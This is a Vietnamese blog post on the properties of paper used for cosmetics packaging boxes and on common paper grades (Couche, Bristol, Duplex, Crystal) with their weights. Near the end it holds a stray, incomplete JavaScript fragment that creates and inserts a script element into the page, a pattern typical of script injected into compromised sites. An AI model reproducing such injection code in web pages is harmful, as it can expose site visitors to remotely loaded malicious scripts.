In ấn - thiết kế

Tính chất vượt trội của loại giấy dùng làm hộp đựng mỹ phẩm

Tính chất vượt trội của loại giấy dùng làm hộp đựng mỹ phẩm

Tính chất vượt trội của loại giấy dùng làm hộp đựng mỹ phẩm

2 (40%) 1 vote

Là một ngành vô cùng tiềm năng ở cả hiện tại và tương lại, các nhà sản xuất và phân phối mỹ phẩm luôn biết làm cách hài lòng khách hàng không chỉ chất lượng của sản phẩm mà còn hình thức bắt mắt, cuốn hút. Hộp giấy đựng mỹ phẩm có vài trò cực kỳ lớn trong việc góp phần hoàn thiện vẻ đẹp của hàng hóa, quảng cáo thương hiệu nhãn hàng cũng như cung cấp thông tin cần thiết cho người tiêu dùng. Chính vì thế mà loại giấy để làm hộp đựng mỹ phẩm cũng cần đạt tiêu chuẩn không kém.

Tính chất giấy cần có để sản xuất hộp đựng mỹ phẩm

Kết cấu giấy có kết cấu chặt chẽ nhiều ưu điểm: không có phản ứng cơ, lý, hoá học đối với sản phẩm mà nó chứa đựng, cũng như chịu được các tác động về các tính chất này từ tác động bên ngoài.
Có khả năng chịu được độ bền trong quá trình vận chuyển xa và khả năng xếp chồng lớn.
Có khả năng tái chế cao nhằm tiết kiệm chi phí cho doanh nghiệp cũng như giảm khả năng tàn phá rừng, bảo vệ môi trường, cân bằng thiên nhiên tạo ra sự phát triển bền vững hơn.
Đạt tiêu chuẩn về chất lượng thẩm mỹ sau khi sản xuất hộp giấy đựng mỹ phẩm như: không cong vênh, không bị xơ, không trầy xướt,…

Hộp giấy đựng mỹ phẩm

Một số loại giấy được dùng để sản xuất hộp đựng mỹ phẩm

Giấy Couche: là một loại giấy được dùng khá phổ biến. Giấy có bề mặt bóng, mịn, láng, in rất bắt mắt và sáng.  Định lượng vào khoảng 90-300g/m2.
Giấy Bristol: cao cấp hơn Couche, giấy dày và xốp hơn, có bề mặt hơi bóng, mịn, bám mực tốt vừa phải, vì thế in offset đẹp, thường dùng nhiều trong làm hộp đựng mỹ phẩm, dược phẩm. Định lượng ở mức 230 – 350g/m2.
Giấy Duplex có bề mặt trắng và lán gần gần với Bristol, mặt kia thường sẫm như giấy bồi. Thường dùng in các bao bì carton sản phẩm kích thước hơi lớn, cần có độ cứng, chắc chắn vì định lượng thường trên 300g/m2.
Giấy Crystal có một mặt rất lán bóng gần như có phủ lớp keo bóng vậy, mặt kia nhám, thường xài trung gian giữa giấy Bristol và giấy Couche tùy theo mục đích yêu cầu sản phẩm.

Mọi thông tin liên quan đến giấy, hộp giấy và túi giấy sẽ được chúng tôi liên tục cập nhật trong các chuyên mục tiếp theo. Mời bạn đọc đón xem!

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

Posted in: Thông tin in ấn

Leave a Comment (0) ↓